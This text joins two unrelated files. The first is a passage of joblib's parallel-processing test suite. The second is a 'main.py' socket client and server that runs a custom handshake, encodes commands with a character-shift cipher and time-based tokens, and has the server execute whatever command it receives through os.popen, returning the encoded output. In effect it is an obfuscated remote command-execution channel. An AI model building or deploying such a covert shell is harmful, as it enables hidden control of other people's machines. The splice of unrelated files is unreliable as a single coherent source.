params = {'n_jobs': n_jobs, 'pre_dispatch': pre_dispatch,
'batch_size': batch_size}
expected = [square(i) for i in range(n_tasks)]
results = Parallel(**params)(delayed(square)(i) for i in range(n_tasks))
assert results == expected
@with_multiprocessing
@skipif(sys.version_info < (3, 5), reason="Bored with Python 2 support")
def test_default_mp_context():
mp_start_method = mp.get_start_method()
p = Parallel(n_jobs=2, backend='multiprocessing')
context = p._backend_args.get('context')
if sys.version_info >= (3, 5):
start_method = context.get_start_method()
assert start_method == mp_start_method
else:
assert context is None
@with_numpy
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_no_blas_crash_or_freeze_with_subprocesses(backend):
if backend == 'multiprocessing':
if sys.version_info < (3, 4):
raise SkipTest('multiprocessing can cause BLAS freeze on old '
'Python that relies on fork.')
# Use the spawn backend that is both robust and available on all
# platforms
backend = mp.get_context('spawn')
# Check that on recent Python versions, the 'spawn' start method makes it
# possible to use multiprocessing in conjunction with any BLAS
# implementation that happens to be used by numpy, without causing a freeze
# or a crash
rng = np.random.RandomState(42)
# call BLAS DGEMM to force the initialization of the internal thread-pool
# in the main process
a = rng.randn(1000, 1000)
np.dot(a, a.T)
# check that the internal BLAS thread-pool is not in an inconsistent state
# in the worker processes managed by multiprocessing
Parallel(n_jobs=2, backend=backend)(
delayed(np.dot)(a, a.T) for i in range(2))
UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_NO_MAIN = """\
from joblib import Parallel, delayed
def square(x):
return x ** 2
backend = "{}"
if backend == "spawn":
from multiprocessing import get_context
backend = get_context(backend)
print(Parallel(n_jobs=2, backend=backend)(
delayed(square)(i) for i in range(5)))
"""
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
@skipif(sys.version_info < (3, 5), reason="Bored with Python 2 support")
def test_parallel_with_interactively_defined_functions(backend):
# When using the "-c" flag, interactive functions defined in __main__
# should work with any backend.
if backend == "multiprocessing" and mp.get_start_method() != "fork":
pytest.skip("Require fork start method to use interactively defined "
"functions with multiprocessing.")
code = UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_NO_MAIN.format(backend)
check_subprocess_call(
[sys.executable, '-c', code], timeout=10,
stdout_regex=r'\[0, 1, 4, 9, 16\]')
UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_MAIN = """\
import sys
# Make sure that joblib is importable in the subprocess launching this
# script. This is needed in case we run the tests from the joblib root
# folder without having installed joblib
sys.path.insert(0, {joblib_root_folder!r})
from joblib import Parallel, delayed
def run(f, x):
return f(x)
{define_func}
if __name__ == "__main__":
backend = "{backend}"
if backend == "spawn":
from multiprocessing import get_context
backend = get_context(backend)
callable_position = "{callable_position}"
if callable_position == "delayed":
print(Parallel(n_jobs=2, backend=backend)(
delayed(square)(i) for i in range(5)))
elif callable_position == "args":
print(Parallel(n_jobs=2, backend=backend)(
delayed(run)(square, i) for i in range(5)))
else:
print(Parallel(n_jobs=2, backend=backend)(
delayed(run)(f=square, x=i) for i in range(5)))
"""
SQUARE_MAIN = """\
def square(x):
return x ** 2
"""
SQUARE_LOCAL = """\
def gen_square():
def square(x):
return x ** 2
return square
square = gen_square()
"""
SQUARE_LAMBDA = """\
square = lambda x: x ** 2
"""
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS +
([] if sys.version_info[:2] < (3, 4) or mp is None
else ['spawn']))
@parametrize('define_func', [SQUARE_MAIN, SQUARE_LOCAL, SQUARE_LAMBDA])
@parametrize('callable_position', ['delayed', 'args', 'kwargs'])
def test_parallel_with_unpicklable_functions_in_args(
backend, define_func, callable_position, tmpdir):
if backend in ['multiprocessing', 'spawn'] and (
define_func != SQUARE_MAIN or sys.platform == "win32"):
pytest.skip("Not picklable with pickle")
code = UNPICKLABLE_CALLABLE_SCRIPT_TEMPLATE_MAIN.format(
define_func=define_func, backend=backend,
callable_position=callable_position,
joblib_root_folder=os.path.dirname(os.path.dirname(joblib.__file__)))
code_file = tmpdir.join("unpicklable_func_script.py")
code_file.write(code)
check_subprocess_call(
[sys.executable, code_file.strpath], timeout=10,
stdout_regex=r'\[0, 1, 4, 9, 16\]')
INTERACTIVE_DEFINED_FUNCTION_AND_CLASS_SCRIPT_CONTENT = """\
import sys
# Make sure that joblib is importable in the subprocess launching this
# script. This is needed in case we run the tests from the joblib root
# folder without having installed joblib
sys.path.insert(0, {joblib_root_folder!r})
from joblib import Parallel, delayed
from functools import partial
class MyClass:
'''Class defined in the __main__ namespace'''
def __init__(self, value):
self.value = value
def square(x, ignored=None, ignored2=None):
'''Function defined in the __main__ namespace'''
return x.value ** 2
square2 = partial(square, ignored2='something')
# Here, we do not need the `if __name__ == "__main__":` safeguard when
# using the default `loky` backend (even on Windows).
# The following baroque function call is meant to check that joblib
# introspection rightfully uses cloudpickle instead of the (faster) pickle
# module of the standard library when necessary. In particular cloudpickle is
# necessary for functions and instances of classes interactively defined in the
# __main__ module.
print(Parallel(n_jobs=2)(
delayed(square2)(MyClass(i), ignored=[dict(a=MyClass(1))])
for i in range(5)
))
""".format(joblib_root_folder=os.path.dirname(
os.path.dirname(joblib.__file__)))
@with_multiprocessing
def test_parallel_with_interactively_defined_functions_default_backend(tmpdir):
# The default backend (loky) accepts interactive functions defined in
# __main__ and does not require if __name__ == '__main__' even when
# the __main__ module is defined by the result of the execution of a
# filesystem script.
script = tmpdir.join('joblib_interactively_defined_function.py')
script.write(INTERACTIVE_DEFINED_FUNCTION_AND_CLASS_SCRIPT_CONTENT)
check_subprocess_call([sys.executable, script.strpath],
stdout_regex=r'\[0, 1, 4, 9, 16\]',
timeout=5)
INTERACTIVELY_DEFINED_SUBCLASS_WITH_METHOD_SCRIPT_CONTENT = """\
import sys
# Make sure that joblib is importable in the subprocess launching this
# script. This is needed in case we run the tests from the joblib root
# folder without having installed joblib
sys.path.insert(0, {joblib_root_folder!r})
from joblib import Parallel, delayed, hash
import multiprocessing as mp
mp.util.log_to_stderr(5)
class MyList(list):
'''MyList is interactively defined but MyList.append is a built-in'''
def __hash__(self):
# XXX: workaround limitation in cloudpickle
return hash(self).__hash__()
l = MyList()
print(Parallel(n_jobs=2)(
delayed(l.append)(i) for i in range(3)
))
""".format(joblib_root_folder=os.path.dirname(
os.path.dirname(joblib.__file__)))
@with_multiprocessing
def test_parallel_with_interactively_defined_bound_method(tmpdir):
script = tmpdir.join('joblib_interactive_bound_method_script.py')
script.write(INTERACTIVELY_DEFINED_SUBCLASS_WITH_METHOD_SCRIPT_CONTENT)
check_subprocess_call([sys.executable, script.strpath],
stdout_regex=r'\[None, None, None\]',
stderr_regex=r'LokyProcess',
timeout=15)
def test_parallel_with_exhausted_iterator():
exhausted_iterator = iter([])
assert Parallel(n_jobs=2)(exhausted_iterator) == []
def check_memmap(a):
if not isinstance(a, np.memmap):
raise TypeError('Expected np.memmap instance, got %r',
type(a))
return a.copy() # return a regular array instead of a memmap
@with_numpy
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_auto_memmap_on_arrays_from_generator(backend):
# Non-regression test for a problem with a bad interaction between the
# GC collecting arrays recently created during iteration inside the
# parallel dispatch loop and the auto-memmap feature of Parallel.
# See: https://github.com/joblib/joblib/pull/294
def generate_arrays(n):
for i in range(n):
yield np.ones(10, dtype=np.float32) * i
# Use max_nbytes=1 to force the use of memory-mapping even for small
# arrays
results = Parallel(n_jobs=2, max_nbytes=1, backend=backend)(
delayed(check_memmap)(a) for a in generate_arrays(100))
for result, expected in zip(results, generate_arrays(len(results))):
np.testing.assert_array_equal(expected, result)
# Second call to force loky to adapt the executor by growing the number
# of worker processes. This is a non-regression test for:
# https://github.com/joblib/joblib/issues/629.
results = Parallel(n_jobs=4, max_nbytes=1, backend=backend)(
delayed(check_memmap)(a) for a in generate_arrays(100))
for result, expected in zip(results, generate_arrays(len(results))):
np.testing.assert_array_equal(expected, result)
def identity(arg):
return arg
@with_numpy
@with_multiprocessing
def test_memmap_with_big_offset(tmpdir):
fname = tmpdir.join('test.mmap').strpath
size = mmap.ALLOCATIONGRANULARITY
obj = [np.zeros(size, dtype='uint8'), np.ones(size, dtype='uint8')]
dump(obj, fname)
memmap = load(fname, mmap_mode='r')
result, = Parallel(n_jobs=2)(delayed(identity)(memmap) for _ in [0])
assert isinstance(memmap[1], np.memmap)
assert memmap[1].offset > size
np.testing.assert_array_equal(obj, result)
def test_warning_about_timeout_not_supported_by_backend():
with warns(None) as warninfo:
Parallel(timeout=1)(delayed(square)(i) for i in range(50))
assert len(warninfo) == 1
w = warninfo[0]
assert isinstance(w.message, UserWarning)
assert str(w.message) == (
"The backend class 'SequentialBackend' does not support timeout. "
"You have set 'timeout=1' in Parallel but the 'timeout' parameter "
"will not be used.")
@parametrize('backend', ALL_VALID_BACKENDS)
@parametrize('n_jobs', [1, 2, -2, -1])
def test_abort_backend(n_jobs, backend):
delays = ["a"] + [10] * 100
with raises(TypeError):
t_start = time.time()
Parallel(n_jobs=n_jobs, backend=backend)(
delayed(time.sleep)(i) for i in delays)
dt = time.time() - t_start
assert dt < 20
@with_numpy
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_memmapping_leaks(backend, tmpdir):
# Non-regression test for memmapping backends. Ensure that the data
# does not stay too long in memory
tmpdir = tmpdir.strpath
# Use max_nbytes=1 to force the use of memory-mapping even for small
# arrays
with Parallel(n_jobs=2, max_nbytes=1, backend=backend,
temp_folder=tmpdir) as p:
p(delayed(check_memmap)(a) for a in [np.random.random(10)] * 2)
# The memmap folder should not be empty while inside the context scope
assert len(os.listdir(tmpdir)) > 0
# Make sure that the shared memory is cleaned at the end when we exit
# the context
assert not os.listdir(tmpdir)
# Make sure that the shared memory is cleaned at the end of a call
p = Parallel(n_jobs=2, max_nbytes=1, backend=backend)
p(delayed(check_memmap)(a) for a in [np.random.random(10)] * 2)
assert not os.listdir(tmpdir)
@parametrize('backend', [None, 'loky', 'threading'])
def test_lambda_expression(backend):
# cloudpickle is used to pickle delayed callables
results = Parallel(n_jobs=2, backend=backend)(
delayed(lambda x: x ** 2)(i) for i in range(10))
assert results == [i ** 2 for i in range(10)]
def test_delayed_check_pickle_deprecated():
if sys.version_info < (3, 5):
pytest.skip("Warning check unstable under Python 2, life is too short")
class UnpicklableCallable(object):
def __call__(self, *args, **kwargs):
return 42
def __reduce__(self):
raise ValueError()
with warns(DeprecationWarning):
f, args, kwargs = delayed(lambda x: 42, check_pickle=False)('a')
assert f('a') == 42
assert args == ('a',)
assert kwargs == dict()
with warns(DeprecationWarning):
f, args, kwargs = delayed(UnpicklableCallable(),
check_pickle=False)('a', option='b')
assert f('a', option='b') == 42
assert args == ('a',)
assert kwargs == dict(option='b')
with warns(DeprecationWarning):
with raises(ValueError):
delayed(UnpicklableCallable(), check_pickle=True)
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_backend_batch_statistics_reset(backend):
"""Test that a parallel backend correctly resets its batch statistics."""
n_jobs = 2
n_inputs = 500
task_time = 2. / n_inputs
p = Parallel(verbose=10, n_jobs=n_jobs, backend=backend)
p(delayed(time.sleep)(task_time) for i in range(n_inputs))
assert (p._backend._effective_batch_size ==
p._backend._DEFAULT_EFFECTIVE_BATCH_SIZE)
assert (p._backend._smoothed_batch_duration ==
p._backend._DEFAULT_SMOOTHED_BATCH_DURATION)
p(delayed(time.sleep)(task_time) for i in range(n_inputs))
assert (p._backend._effective_batch_size ==
p._backend._DEFAULT_EFFECTIVE_BATCH_SIZE)
assert (p._backend._smoothed_batch_duration ==
p._backend._DEFAULT_SMOOTHED_BATCH_DURATION)
def test_backend_hinting_and_constraints():
for n_jobs in [1, 2, -1]:
assert type(Parallel(n_jobs=n_jobs)._backend) == LokyBackend
p = Parallel(n_jobs=n_jobs, prefer='threads')
assert type(p._backend) == ThreadingBackend
p = Parallel(n_jobs=n_jobs, prefer='processes')
assert type(p._backend) == LokyBackend
p = Parallel(n_jobs=n_jobs, require='sharedmem')
assert type(p._backend) == ThreadingBackend
# Explicit backend selection can override backend hinting although it
# is useless to pass a hint when selecting a backend.
p = Parallel(n_jobs=2, backend='loky', prefer='threads')
assert type(p._backend) == LokyBackend
with parallel_backend('loky', n_jobs=2):
# Explicit backend selection by the user with the context manager
# should be respected when combined with backend hints only.
p = Parallel(prefer='threads')
assert type(p._backend) == LokyBackend
assert p.n_jobs == 2
with parallel_backend('loky', n_jobs=2):
# Locally hard-coded n_jobs value is respected.
p = Parallel(n_jobs=3, prefer='threads')
assert type(p._backend) == LokyBackend
assert p.n_jobs == 3
with parallel_backend('loky', n_jobs=2):
# Explicit backend selection by the user with the context manager
# should be ignored when the Parallel call has hard constraints.
# In this case, the default backend that supports shared mem is
# used and the default number of processes is used.
p = Parallel(require='sharedmem')
assert type(p._backend) == ThreadingBackend
assert p.n_jobs == 1
with parallel_backend('loky', n_jobs=2):
p = Parallel(n_jobs=3, require='sharedmem')
assert type(p._backend) == ThreadingBackend
assert p.n_jobs == 3
def test_backend_hinting_and_constraints_with_custom_backends(capsys):
# Custom backends can declare that they use threads and have shared memory
# semantics:
class MyCustomThreadingBackend(ParallelBackendBase):
supports_sharedmem = True
use_threads = True
def apply_async(self):
pass
def effective_n_jobs(self, n_jobs):
return n_jobs
with parallel_backend(MyCustomThreadingBackend()):
p = Parallel(n_jobs=2, prefer='processes') # ignored
assert type(p._backend) == MyCustomThreadingBackend
p = Parallel(n_jobs=2, require='sharedmem')
assert type(p._backend) == MyCustomThreadingBackend
class MyCustomProcessingBackend(ParallelBackendBase):
supports_sharedmem = False
use_threads = False
def apply_async(self):
pass
def effective_n_jobs(self, n_jobs):
return n_jobs
with parallel_backend(MyCustomProcessingBackend()):
p = Parallel(n_jobs=2, prefer='processes')
assert type(p._backend) == MyCustomProcessingBackend
out, err = capsys.readouterr()
assert out == ""
assert err == ""
p = Parallel(n_jobs=2, require='sharedmem', verbose=10)
assert type(p._backend) == ThreadingBackend
out, err = capsys.readouterr()
expected = ("Using ThreadingBackend as joblib.Parallel backend "
"instead of MyCustomProcessingBackend as the latter "
"does not provide shared memory semantics.")
assert out.strip() == expected
assert err == ""
with raises(ValueError):
Parallel(backend=MyCustomProcessingBackend(), require='sharedmem')
def test_invalid_backend_hinting_and_constraints():
with raises(ValueError):
Parallel(prefer='invalid')
with raises(ValueError):
Parallel(require='invalid')
with raises(ValueError):
# It is inconsistent to prefer process-based parallelism while
# requiring shared memory semantics.
Parallel(prefer='processes', require='sharedmem')
# It is inconsistent to ask explicitly for process-based parallelism
# while requiring shared memory semantics.
with raises(ValueError):
Parallel(backend='loky', require='sharedmem')
with raises(ValueError):
Parallel(backend='multiprocessing', require='sharedmem')
def test_global_parallel_backend():
default = Parallel()._backend
pb = parallel_backend('threading')
assert isinstance(Parallel()._backend, ThreadingBackend)
pb.unregister()
assert type(Parallel()._backend) is type(default)
def test_external_backends():
def register_foo():
BACKENDS['foo'] = ThreadingBackend
EXTERNAL_BACKENDS['foo'] = register_foo
with parallel_backend('foo'):
assert isinstance(Parallel()._backend, ThreadingBackend)
def _recursive_backend_info(limit=3, **kwargs):
"""Perform nested parallel calls and introspect the backend on the way"""
with Parallel(n_jobs=2) as p:
this_level = [(type(p._backend).__name__, p._backend.nesting_level)]
if limit == 0:
return this_level
results = p(delayed(_recursive_backend_info)(limit=limit - 1, **kwargs)
for i in range(1))
return this_level + results[0]
@with_multiprocessing
@parametrize('backend', ['loky', 'threading'])
def test_nested_parallelism_limit(backend):
with parallel_backend(backend, n_jobs=2):
backend_types_and_levels = _recursive_backend_info()
if cpu_count() == 1:
second_level_backend_type = 'SequentialBackend'
max_level = 1
else:
second_level_backend_type = 'ThreadingBackend'
max_level = 2
top_level_backend_type = backend.title() + 'Backend'
expected_types_and_levels = [
(top_level_backend_type, 0),
(second_level_backend_type, 1),
('SequentialBackend', max_level),
('SequentialBackend', max_level)
]
assert backend_types_and_levels == expected_types_and_levels
@with_numpy
@skipif(distributed is None, reason='This test requires dask')
def test_nested_parallelism_with_dask():
client = distributed.Client(n_workers=2, threads_per_worker=2) # noqa
# 10 MB of data as argument to trigger implicit scattering
data = np.ones(int(1e7), dtype=np.uint8)
for i in range(2):
with parallel_backend('dask'):
backend_types_and_levels = _recursive_backend_info(data=data)
assert len(backend_types_and_levels) == 4
assert all(name == 'DaskDistributedBackend'
for name, _ in backend_types_and_levels)
# No argument
with parallel_backend('dask'):
backend_types_and_levels = _recursive_backend_info()
assert len(backend_types_and_levels) == 4
assert all(name == 'DaskDistributedBackend'
for name, _ in backend_types_and_levels)
def _recursive_parallel(nesting_limit=None):
"""A horrible function that does recursive parallel calls"""
return Parallel()(delayed(_recursive_parallel)() for i in range(2))
@parametrize('backend', ['loky', 'threading'])
def test_thread_bomb_mitigation(backend):
# Test that recursive parallelism raises a RecursionError rather than
# saturating the operating system's resources by creating an unbounded number
# of threads.
with parallel_backend(backend, n_jobs=2):
with raises(RecursionError):
_recursive_parallel()
def _run_parallel_sum():
env_vars = {}
for var in ['OMP_NUM_THREADS', 'OPENBLAS_NUM_THREADS', 'MKL_NUM_THREADS',
'VECLIB_MAXIMUM_THREADS', 'NUMEXPR_NUM_THREADS',
'NUMBA_NUM_THREADS', 'ENABLE_IPC']:
env_vars[var] = os.environ.get(var)
return env_vars, parallel_sum(100)
@parametrize("backend", [None, 'loky'])
@skipif(parallel_sum is None, reason="Need OpenMP helper compiled")
def test_parallel_thread_limit(backend):
results = Parallel(n_jobs=2, backend=backend)(
delayed(_run_parallel_sum)() for _ in range(2)
)
expected_num_threads = max(cpu_count() // 2, 1)
for worker_env_vars, omp_num_threads in results:
assert omp_num_threads == expected_num_threads
for name, value in worker_env_vars.items():
if name.endswith("_THREADS"):
assert value == str(expected_num_threads)
else:
assert name == "ENABLE_IPC"
assert value == "1"
@skipif(distributed is not None,
reason='This test requires dask NOT installed')
def test_dask_backend_when_dask_not_installed():
with raises(ValueError, match='Please install dask'):
parallel_backend('dask')
def test_zero_worker_backend():
# joblib.Parallel should reject, with an explicit error message, parallel
# backends that have no worker.
class ZeroWorkerBackend(ThreadingBackend):
def configure(self, *args, **kwargs):
return 0
def apply_async(self, func, callback=None): # pragma: no cover
raise TimeoutError("No worker available")
def effective_n_jobs(self, n_jobs): # pragma: no cover
return 0
expected_msg = "ZeroWorkerBackend has no active worker"
with parallel_backend(ZeroWorkerBackend()):
with pytest.raises(RuntimeError, match=expected_msg):
Parallel(n_jobs=2)(delayed(id)(i) for i in range(2))
def test_globals_update_at_each_parallel_call():
# This is a non-regression test related to joblib issues #836 and #833.
# Cloudpickle versions between 0.5.4 and 0.7 introduced a bug where changes
# to global variables made in a parent process between two calls to
# joblib.Parallel would not be propagated into the workers.
global MY_GLOBAL_VARIABLE
MY_GLOBAL_VARIABLE = "original value"
def check_globals():
global MY_GLOBAL_VARIABLE
return MY_GLOBAL_VARIABLE
assert check_globals() == "original value"
workers_global_variable = Parallel(n_jobs=2)(
delayed(check_globals)() for i in range(2))
assert set(workers_global_variable) == {"original value"}
# Change the value of MY_GLOBAL_VARIABLE, and make sure this change gets
# propagated into the workers environment
MY_GLOBAL_VARIABLE = "changed value"
assert check_globals() == "changed value"
workers_global_variable = Parallel(n_jobs=2)(
delayed(check_globals)() for i in range(2))
assert set(workers_global_variable) == {"changed value"}
##############################################################################
# Test environment variable in child env, in particular for limiting
# the maximal number of threads in C-library threadpools.
#
def _check_numpy_threadpool_limits():
import numpy as np
# Let's call BLAS on a Matrix Matrix multiplication with dimensions large
# enough to ensure that the threadpool managed by the underlying BLAS
# implementation is actually used so as to force its initialization.
a = np.random.randn(100, 100)
np.dot(a, a)
from threadpoolctl import threadpool_info
return threadpool_info()
def _parent_max_num_threads_for(child_module, parent_info):
for parent_module in parent_info:
if parent_module['filepath'] == child_module['filepath']:
return parent_module['num_threads']
raise ValueError("An unexpected module was loaded in child:\n{}"
.format(child_module))
def check_child_num_threads(workers_info, parent_info, num_threads):
# Check that the number of threads reported in workers_info is consistent
    # with the expectation. We need to be careful to handle the cases where
# the requested number of threads is below max_num_thread for the library.
for child_threadpool_info in workers_info:
for child_module in child_threadpool_info:
parent_max_num_threads = _parent_max_num_threads_for(
child_module, parent_info)
expected = {min(num_threads, parent_max_num_threads), num_threads}
assert child_module['num_threads'] in expected
@with_numpy
@with_multiprocessing
@skipif(sys.version_info < (3, 5),
reason='threadpoolctl is a python3.5+ package')
@parametrize('n_jobs', [2, 4, -2, -1])
def test_threadpool_limitation_in_child(n_jobs):
# Check that the protection against oversubscription in workers is working
# using threadpoolctl functionalities.
# Skip this test if numpy is not linked to a BLAS library
parent_info = _check_numpy_threadpool_limits()
if len(parent_info) == 0:
pytest.skip(msg="Need a version of numpy linked to BLAS")
workers_threadpool_infos = Parallel(n_jobs=n_jobs)(
delayed(_check_numpy_threadpool_limits)() for i in range(2))
n_jobs = effective_n_jobs(n_jobs)
expected_child_num_threads = max(cpu_count() // n_jobs, 1)
check_child_num_threads(workers_threadpool_infos, parent_info,
expected_child_num_threads)
@with_numpy
@with_multiprocessing
@skipif(sys.version_info < (3, 5),
reason='threadpoolctl is a python3.5+ package')
@parametrize('inner_max_num_threads', [1, 2, 4, None])
@parametrize('n_jobs', [2, -1])
def test_threadpool_limitation_in_child_context(n_jobs, inner_max_num_threads):
# Check that the protection against oversubscription in workers is working
# using threadpoolctl functionalities.
# Skip this test if numpy is not linked to a BLAS library
parent_info = _check_numpy_threadpool_limits()
if len(parent_info) == 0:
pytest.skip(msg="Need a version of numpy linked to BLAS")
with parallel_backend('loky', inner_max_num_threads=inner_max_num_threads):
workers_threadpool_infos = Parallel(n_jobs=n_jobs)(
delayed(_check_numpy_threadpool_limits)() for i in range(2))
n_jobs = effective_n_jobs(n_jobs)
if inner_max_num_threads is None:
expected_child_num_threads = max(cpu_count() // n_jobs, 1)
else:
expected_child_num_threads = inner_max_num_threads
check_child_num_threads(workers_threadpool_infos, parent_info,
expected_child_num_threads)
@with_multiprocessing
@parametrize('n_jobs', [2, -1])
@parametrize('var_name', ["OPENBLAS_NUM_THREADS",
"MKL_NUM_THREADS",
"OMP_NUM_THREADS"])
def test_threadpool_limitation_in_child_override(n_jobs, var_name):
# Check that environment variables set by the user on the main process
# always have the priority.
# Clean up the existing executor because we change the environment of the
    # parent at runtime, and loky intentionally does not detect such changes.
get_reusable_executor(reuse=True).shutdown()
def _get_env(var_name):
return os.environ.get(var_name)
original_var_value = os.environ.get(var_name)
try:
os.environ[var_name] = "4"
# Skip this test if numpy is not linked to a BLAS library
results = Parallel(n_jobs=n_jobs)(
delayed(_get_env)(var_name) for i in range(2))
assert results == ["4", "4"]
with parallel_backend('loky', inner_max_num_threads=1):
results = Parallel(n_jobs=n_jobs)(
delayed(_get_env)(var_name) for i in range(2))
assert results == ["1", "1"]
finally:
if original_var_value is None:
del os.environ[var_name]
else:
os.environ[var_name] = original_var_value
@with_numpy
@with_multiprocessing
@parametrize('backend', ['multiprocessing', 'threading',
MultiprocessingBackend(), ThreadingBackend()])
def test_threadpool_limitation_in_child_context_error(backend):
with raises(AssertionError, match=r"does not acc.*inner_max_num_threads"):
parallel_backend(backend, inner_max_num_threads=1)
@with_multiprocessing
@parametrize('n_jobs', [2, 4, -1])
def test_loky_reuse_workers(n_jobs):
# Non-regression test for issue #967 where the workers are not reused when
# calling multiple Parallel loops.
def parallel_call(n_jobs):
x = range(10)
Parallel(n_jobs=n_jobs)(delayed(sum)(x) for i in range(10))
# Run a parallel loop and get the workers used for computations
parallel_call(n_jobs)
first_executor = get_reusable_executor(reuse=True)
# Ensure that the workers are reused for the next calls, as the executor is
# not restarted.
for _ in range(10):
parallel_call(n_jobs)
executor = get_reusable_executor(reuse=True)
assert executor == first_executor
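# Illustrative sketch (not part of the test suite above): the threadpool tests
# verify that the loky backend caps C-level threadpools inside workers.  Assuming
# joblib >= 0.14 and numpy are installed, that mechanism is used like this:
def _example_inner_thread_limit():  # hypothetical helper, never collected or called
    import numpy as np
    def blas_heavy(n):
        a = np.random.randn(n, n)
        return np.dot(a, a).sum()
    # Each loky worker exposes at most one thread to BLAS/OpenMP threadpools.
    with parallel_backend('loky', inner_max_num_threads=1):
        return Parallel(n_jobs=2)(delayed(blas_heavy)(200) for _ in range(4))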
|
main.py
|
import socket, sys, random, os
import time
from multiprocessing import Process
from datetime import datetime
server_old_private_value, server_private_value, server_private_time = 0, 0, 0
client_old_private_value, client_private_value, client_private_time = 0, 0, 0
token = 0
common_value = 1758
old_token, new_token, old_token_caducity, new_token_caducity = 0, 0, 0, 0
exec_window = [0, 0]
state_machine_end_mark = "forMerkStateMachineClientEnds"
def MERKFlagTokenAndTimeSlot():
global old_token, new_token, old_token_caducity, new_token_caducity, exec_window
time_data = datetime.now().strftime("%M/%S").split("/")
actual_time = (int(time_data[0]) * 100) + int(time_data[1])
if actual_time > exec_window[0]:
        # time to rotate the tokens
old_token = new_token
new_token = random.randrange(0, 999999999)
        # time to renew the token lifetime
old_token_caducity = new_token_caducity
new_token_caducity = random.randrange(2, 5)
exec_window = [actual_time + old_token_caducity, actual_time + old_token_caducity + new_token_caducity]
return old_token_caducity, new_token, new_token_caducity, old_token
def MERKgenTimeFlag():
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y/%H/%M/%S").split("/")
val1 = 21
val2 = int(dt_string[1])
val3 = int(dt_string[0])
val4 = int(dt_string[3])
val5 = int(dt_string[4])
val6 = int(dt_string[5])
    # NOTE: '^' is Python's bitwise XOR (not exponentiation) and binds more loosely
    # than '+'; client and server share this function, so the handshake stays consistent.
    to_return = (val1 - val2) ^ 2 + (val3 - val4) ^ 2 + (val5 - val6) ^ 2
    to_return2 = (val1 - val2) ^ 2 + (val3 - val4) ^ 2 + (val5 - (val6 - 1)) ^ 2
return to_return, to_return2
def forMERKGetServerPrivateValue():
global server_private_time
global server_private_value
global server_old_private_value
time_data = datetime.now().strftime("%M/%S").split("/")
new_server_time = (int(time_data[0]) * 100) + int(time_data[1])
if new_server_time > server_private_time:
server_old_private_value = server_private_value
server_private_time = new_server_time + random.randrange(3, 5)
server_private_value = random.randrange(0, 9999)
return server_private_value
def forMERKGetClientPrivateValue():
global client_private_time
global client_private_value
global client_old_private_value
time_data = datetime.now().strftime("%M/%S").split("/")
new_server_time = (int(time_data[0]) * 100) + int(time_data[1])
if new_server_time > client_private_time:
client_old_private_value = client_private_value
client_private_time = new_server_time + random.randrange(3, 5)
client_private_value = random.randrange(0, 9999)
return client_private_value
def MERKcifValue(command, token):
to_return = ""
for letter in command:
to_return += str(ord(letter) + int(token)) + ","
return to_return[:-1]
def MERKgetValue(array_letters, token):
to_return = ""
for letter in array_letters:
try:
to_return += chr(int(letter) - token)
except:
to_return = "error_91"
return to_return
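def _merk_cipher_roundtrip_example(token=42):
    # Illustration only (never called): MERKcifValue shifts every character of the
    # command by the shared token; MERKgetValue reverses the shift, so the round
    # trip recovers the original text.
    encoded = MERKcifValue("echo jeje", token)         # "143,141,146,153,74,148,143,148,143"
    decoded = MERKgetValue(encoded.split(","), token)  # -> "echo jeje"
    return encoded, decoded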
def MERKClient(data, sender, forMerkStateMachineClient):
global common_value
obj = data.split(":")[0]
port = data.split(":")[1]
to_send = "DH_1"
response = ""
while "forMerkStateMachineClientEnds" not in to_send:
response = sender(to_send, obj, int(port)).decode()
if len(response) > 0:
if "/" in response:
if int(response.split("/")[1]) in MERKgenTimeFlag():
response = response.split("/")[0]
if len(response) > 0:
to_send = forMerkStateMachineClient(response)
else:
to_send = "forMerkStateMachineClientEnds"
return response
def forMerkStateMachineClient(data):
global token
to_return = ""
global state_machine_end_mark
if "DH_1" in data:
server_value = int(data.split("DH_1:")[1]) - common_value
to_return = ("DH_2:" + str(int(server_value) + forMERKGetClientPrivateValue()))
elif "DH_2" in data:
time_slot_start = int(data.split("DH_2:")[1].split(",")[0]) - client_private_value
token = int(data.split(",")[1]) - client_private_value
command_data = MERKcifValue("echo jeje", token)
time.sleep(int(time_slot_start))
to_return = "PVT_1:" + command_data
elif "PVT_1" in data:
to_return = state_machine_end_mark + MERKgetValue(data.split("PVT_1:")[1].split(","), token)
return to_return
def forMerkStateMachineServer(data, priv_value, token_vals):
global server_values
to_send = ""
time_flags = MERKgenTimeFlag()
if int(data.split("/")[1]) in time_flags:
if "DH_1" in data:
to_send = "DH_1:" + str(priv_value + common_value) + "/" + str(MERKgenTimeFlag()[0])
elif "DH_2" in data:
client_value = int(data.split("DH_2:")[1].split("/")[0]) - priv_value
to_send = "DH_2:" + str(client_value + token_vals[0]) + "," + str(client_value + token_vals[1]) + "/" + str(
MERKgenTimeFlag()[0])
elif "PVT_1" in data:
aux_command = data.split("PVT_1:")[1].split("/")[0].split(",")
command = ""
try:
for c in aux_command:
command += chr(int(c) - token_vals[1])
except:
command = ""
for c in aux_command:
command += chr(int(c) - token_vals[3])
result = MERKcifValue(os.popen(command).read(), token_vals[1])
time.sleep(0.004)
to_send = "PVT_1:" + result + "/" + str(MERKgenTimeFlag()[0])
else:
to_send = "error_161"
return to_send
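# Protocol summary (derived from the state machines above; illustration only):
#   DH_1 : server -> client : server_private + common_value
#   DH_2 : client -> server : server_private + client_private
#          server reply     : (time_slot + client_private, token + client_private)
#   PVT_1: client -> server : command encoded with MERKcifValue(command, token);
#          the server runs it via os.popen and returns the output encoded the same way.
# Every message carries a "/<time flag>" suffix that both ends check against
# MERKgenTimeFlag() before acting on the payload.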
def forMerkSendData(data, obj, port):
data_to_send = str(data) + "/" + str(MERKgenTimeFlag()[0])
data = ""
print("Sending C->S :" + str(data_to_send) + " to " + str(obj) + ":" + str(port))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
count = 0
while count < 3:
s.connect((obj, int(port)))
s.sendall(bytes(data_to_send, 'utf-8'))
data = s.recv(1024)
s.close()
count = 3
